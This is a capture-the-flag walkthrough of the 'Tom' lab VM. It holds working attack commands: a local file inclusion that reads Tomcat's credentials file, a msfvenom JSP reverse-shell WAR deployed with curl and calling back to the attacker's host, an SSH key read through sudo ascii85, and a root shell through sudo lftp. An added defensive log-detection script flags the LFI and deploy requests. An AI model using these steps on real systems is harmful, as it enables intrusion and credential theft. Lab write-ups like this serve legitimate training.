# Lab setup

Download: Tom

NAT, IP: 192.168.1.168

# Penetration process

# Initial information gathering

```
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 55:5f:3f:15:c7:cb:5f:09:d6:a1:f5:70:06:d0:dd:bc (RSA)
|   256 ec:db:41:19:b8:60:bc:53:6f:c7:ef:c6:d3:ee:b9:b8 (ECDSA)
|_  256 2e:0d:03:27:a5:2a:0b:4e:b0:6a:42:01:57:fd:a9:9f (ED25519)
80/tcp   open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.38 (Debian)
8080/tcp open  http    Apache Tomcat 9.0.54
|_http-title: Apache Tomcat/9.0.54
|_http-favicon: Apache Tomcat
```

Enumerating directories on port 80 turns up a tomcat.php page; fuzzing its parameters gives `filez`, which includes files from disk. The first file to include is Tomcat's systemd unit, /etc/systemd/system/tomcat.service.

That unit file reveals CATALINA_HOME, so the next include targets the credentials file tomcat-users.xml:

```
http://192.168.1.168/tomcat.php?filez=/opt/tomcat/latest/conf/tomcat-users.xml
```

The result has to be viewed via F12 (developer tools), since the XML tags are not rendered in the page.

Credentials obtained: tomcat/t0mL1k3$c4t$!!!

Upload a WAR package to get a shell:

```
┌──(root㉿kali)-[~/Tom]
└─# msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.129 LPORT=4444 -f war -o gddfeng.war
Payload size: 1092 bytes
Final size of war file: 1092 bytes
Saved as: gddfeng.war

┌──(root㉿kali)-[~/Tom]
└─# curl --upload-file gddfeng.war -u 'tomcat:t0mL1k3$c4t$!!!' "http://192.168.1.168:8080/manager/text/deploy?path=/gddfeng"
OK - Desplegada aplicación en trayectoria de contexto [/gddfeng]
┌──(root㉿kali)-[~/Tom]
└─# curl http://192.168.1.168:8080/gddfeng/
```

Reverse shell obtained.
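From the defender's side, the whole web chain above leaves two distinctive traces in access logs: a file parameter pointed at an absolute filesystem path, and a PUT/POST to the Tomcat Manager deploy endpoint. The following is an added example (not part of the original write-up) that parses constructed Apache/Tomcat access-log lines and flags both stages; the log lines, IPs and timestamps are made up to mirror the write-up.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote
# Common/combined log line: host ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+)[^"]*" \d{3}')
# Substrings that show a file parameter being pointed at the server filesystem
PATH_HINTS = ("/etc/", "/opt/", "/proc/", "/var/", "../")
# Tomcat Manager endpoints that accept a WAR and run it under the Tomcat user
DEPLOY_PREFIXES = ("/manager/text/deploy", "/manager/html/upload")

def parse_line(line):
    # Returns a dict for one access-log line, or None if it does not parse
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    return {"ip": m.group("ip"), "method": m.group("method"), "path": parts.path,
            "params": parse_qsl(parts.query, keep_blank_values=True)}

def lfi_candidates(entry):
    # Query parameters whose (double-decoded) value looks like a filesystem path
    hits = []
    for name, value in entry["params"]:
        value = unquote(value)  # second decode catches %252e%252e-style evasion
        if any(hint in value for hint in PATH_HINTS):
            hits.append((name, value))
    return hits

def is_manager_deploy(entry):
    # PUT/POST to a Manager deploy endpoint, which is what `curl --upload-file` sends
    return entry["method"] in ("PUT", "POST") and entry["path"].startswith(DEPLOY_PREFIXES)

def detect(lines):
    # Scan log lines and return (kind, source_ip, detail) alerts in log order
    alerts = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        for name, value in lfi_candidates(entry):
            alerts.append(("LFI", entry["ip"], f"{entry['path']}?{name}={value}"))
        if is_manager_deploy(entry):
            alerts.append(("WAR_DEPLOY", entry["ip"], entry["path"]))
    return alerts
# Constructed sample lines mirroring the chain above (port 80 Apache, port 8080 Tomcat access log)
SAMPLE_LOG = [
    '192.168.1.129 - - [12/Dec/2021:10:01:03 +0000] "GET /tomcat.php?filez=/etc/systemd/system/tomcat.service HTTP/1.1" 200 812',
    '192.168.1.129 - - [12/Dec/2021:10:01:09 +0000] "GET /tomcat.php?filez=/opt/tomcat/latest/conf/tomcat-users.xml HTTP/1.1" 200 1473',
    '192.168.1.129 - tomcat [12/Dec/2021:10:02:40 +0000] "PUT /manager/text/deploy?path=/gddfeng HTTP/1.1" 200 57',
    '192.168.1.50 - - [12/Dec/2021:10:03:00 +0000] "GET /index.html HTTP/1.1" 200 10701',
]
```

Both Apache's default access log and Tomcat's AccessLogValve default pattern (`%h %l %u %t "%r" %s %b`) fit the regex, so `detect()` runs unchanged over either file; the Manager deploy hit is the higher-fidelity signal of the two, since a legitimate deployment from an unexpected source address is rare.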

# Privilege escalation

```
tomcat@tom:~$ sudo -l
Matching Defaults entries for tomcat on tom:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User tomcat may run the following commands on tom:
    (nathan) NOPASSWD: /usr/bin/ascii85
tomcat@tom:~$ LFILE=/home/nathan/.ssh/id_rsa
tomcat@tom:~$ sudo -u nathan ascii85 "$LFILE" | ascii85 --decode
-----BEGIN RSA PRIVATE KEY-----
[key body omitted]
-----END RSA PRIVATE KEY-----
```

Connect over SSH with the recovered key:

```
┌──(root㉿kali)-[~/Tom]
└─# ssh -i id_rsa nathan@192.168.1.168
The authenticity of host '192.168.1.168 (192.168.1.168)' can't be established.
ED25519 key fingerprint is SHA256:W4aCT/yYEsAYSFhsgZMp4TqApHolrSjUUwc93DqYd+c.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.168' (ED25519) to the list of known hosts.
Linux tom 4.19.0-18-amd64 #1 SMP Debian 4.19.208-1 (2021-09-29) x86_64
nathan@tom:~$ sudo -l
Matching Defaults entries for nathan on tom:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User nathan may run the following commands on tom:
    (root) NOPASSWD: /usr/bin/lftp
nathan@tom:~$ sudo lftp -c '!/bin/bash'
root@tom:/home/nathan# cat /root/root.txt 
a2780681529284ec485c2d0e0a7f6831
```